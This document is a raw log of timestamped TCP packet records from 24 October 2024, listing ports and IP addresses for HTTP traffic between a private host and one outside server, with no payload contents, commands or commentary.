Oct 24, 2024 13:54:20.074136019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074163914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074168921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074210882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074217081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074259996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074271917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074314117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074320078 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074356079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074361086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074403048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074409008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074445009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074448109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074479103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074487925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074531078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074533939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074601889 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074632883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074639082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074655056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074688911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074697971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074723959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074731112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074759007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074767113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074804068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074815989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074858904 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074870110 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074909925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074924946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074958086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.074971914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.074992895 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075001955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075027943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075037956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075067043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075084925 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075134039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075143099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075195074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075195074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075229883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075237036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075283051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075285912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075330019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075340033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075376987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075386047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075424910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075429916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075465918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075467110 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075500011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075508118 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075536013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075544119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075625896 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075639963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075674057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075683117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075709105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075712919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075757980 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075768948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075793028 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075799942 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075829029 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075834036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075866938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075884104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075906992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075920105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075953960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075964928 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.075989008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.075994968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076024055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076050043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076056957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076066971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076091051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076097965 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076128006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076132059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076162100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076169968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076199055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076205015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076234102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076241970 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076268911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076272964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076302052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076307058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076338053 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076344013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076374054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076381922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076411009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076414108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076442957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.076452017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.076482058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189178944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189261913 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189280033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189332008 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189340115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189379930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189384937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189415932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189424038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189460039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189472914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189507008 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189518929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189542055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189554930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189589024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189600945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189642906 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189661026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189697027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189704895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189738035 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189743996 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189774036 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189790964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189829111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189832926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189860106 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189877987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189894915 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189901114 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189929962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189934015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.189965010 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.189970016 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190000057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190005064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190040112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190073967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190073967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190074921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190139055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190144062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190174103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190186024 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190205097 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190210104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190249920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190259933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190295935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190303087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190346956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190361023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190382957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190387011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190427065 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190429926 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190466881 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190481901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190517902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190527916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190556049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190570116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190599918 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190613985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190634012 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190634966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190675020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190686941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190726995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190738916 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190773964 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190778971 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190812111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190824032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190850019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190853119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190884113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190896988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190918922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.190926075 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190960884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.190975904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191011906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191018105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191046953 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191052914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191082001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191086054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191117048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191121101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191153049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191159010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191185951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191195011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191220999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191226959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191261053 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191273928 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191308975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191334009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191351891 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191380978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191416025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191423893 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191448927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191457033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191485882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191492081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191529989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191543102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191590071 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191596985 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191631079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191639900 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191665888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191673994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191703081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191709042 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191737890 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191749096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191772938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191780090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191808939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191812992 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191844940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191850901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191879988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191885948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191911936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191921949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191945076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191956043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.191978931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.191992998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192013979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192023993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192049026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192056894 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192084074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192090034 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192118883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192127943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192148924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192158937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192183971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192195892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192219019 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192225933 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192253113 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192260981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192287922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192292929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192322969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192329884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192363024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192390919 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192397118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192401886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192433119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192444086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192470074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192506075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192511082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192511082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192536116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.192550898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.192583084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304359913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304392099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304408073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304435015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304461956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304461956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304538965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304555893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304573059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304577112 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304593086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304609060 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304626942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304631948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304631948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304645061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304631948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304660082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304689884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304693937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304693937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304693937 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304708958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304724932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304776907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304789066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304795027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304790020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304790020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304790020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304816961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304820061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304831028 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304835081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304855108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304861069 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304877043 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304881096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.304893017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304915905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.304958105 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305001020 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305007935 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305018902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305039883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305051088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305094004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305113077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305135012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305147886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305190086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305207014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305222988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:20.305231094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:20.305238962 CEST	80	49714	95.182.96.50	192.168.2.6
